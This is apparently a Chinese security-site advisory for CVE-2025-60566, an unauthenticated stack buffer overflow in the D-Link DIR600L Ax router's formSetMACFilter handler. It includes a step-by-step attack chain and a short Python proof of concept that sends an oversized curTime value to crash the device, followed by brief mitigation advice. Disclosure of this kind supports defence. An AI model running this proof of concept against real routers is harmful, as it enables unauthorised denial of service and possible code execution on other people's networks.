IPBUF安全漏洞报告
English
CVE-2025-60566 CVSS 7.5 高危

D-Link DIR600L Ax缓冲区溢出漏洞(CVE-2025-60566)

披露日期: 2025-10-24

漏洞信息

漏洞编号
CVE-2025-60566
漏洞类型
缓冲区溢出
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
D-Link DIR600L Ax FW116WWb01

相关标签

缓冲区溢出D-LinkDIR600L路由器拒绝服务远程代码执行CVE-2025-60566嵌入式设备

漏洞概述

D-Link DIR600L Ax FW116WWb01版本路由器存在缓冲区溢出漏洞。该漏洞位于formSetMACFilter函数中,攻击者可通过curTime参数注入超长字符串,触发缓冲区溢出。由于该漏洞无需认证即可利用,攻击者可通过网络远程发送恶意请求,在无需任何用户交互的情况下实现攻击。成功利用此漏洞可导致设备服务中断(可用性影响:高),造成拒绝服务攻击。攻击者可能通过构造精心设计的请求包,使目标设备崩溃或执行任意代码,对网络基础设施造成严重威胁。

技术细节

该漏洞为典型的栈缓冲区溢出(Stack Buffer Overflow)漏洞。在D-Link DIR600L Ax路由器的formSetMACFilter函数中,程序未对用户输入的curTime参数进行长度验证,直接将其复制到固定大小的缓冲区中。当攻击者发送超长的curTime值时,超出缓冲区容量的数据会覆盖相邻的栈内存区域,包括返回地址和保存的寄存器值。攻击者可通过精确构造溢出数据,覆盖返回地址使其指向恶意代码,从而实现代码执行。由于漏洞存在于Web管理接口的处理逻辑中,攻击者可通过HTTP请求远程触发。CVSS向量显示攻击复杂度低(AC:L),无需认证(PR:N)和用户交互(UI:N),属于极易利用的高危漏洞。

攻击链分析

STEP 1
步骤1
信息收集:识别目标D-Link DIR600L Ax路由器,确认设备IP地址和Web管理接口可访问
STEP 2
步骤2
构造恶意请求:准备包含超长字符串的curTime参数载荷,用于触发缓冲区溢出
STEP 3
步骤3
发送攻击请求:向/formSetMACFilter端点发送POST请求,无需任何认证
STEP 4
步骤4
触发溢出:超长curTime值覆盖栈内存,破坏返回地址和关键数据结构
STEP 5
步骤5
结果验证:设备崩溃或执行攻击者控制的代码,实现拒绝服务或远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2025-60566 PoC - D-Link DIR600L Ax Buffer Overflow # Target: formSetMACFilter function with curTime parameter target_ip = "192.168.0.1" # Router default IP target_url = f"http://{target_ip}/formSetMACFilter" # Generate payload with excessive length to trigger buffer overflow # Typical buffer size in embedded devices is 256-1024 bytes payload = "A" * 2000 data = { "curTime": payload, "macFilterEnabled": "1" } try: print(f"[*] Sending exploit to {target_url}") print(f"[*] Payload length: {len(payload)}") response = requests.post(target_url, data=data, timeout=10) print(f"[+] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") print("[+] If device becomes unresponsive, vulnerability is confirmed")

影响范围

D-Link DIR600L Ax FW116WWb01

防御指南

临时缓解措施
立即关闭路由器的远程管理功能,仅允许通过本地网络访问Web管理界面。部署网络访问控制列表(ACL),限制管理接口的访问源IP。如无法立即更新固件,可考虑使用入侵检测系统(IDS)监控针对/formSetMACFilter端点的异常请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表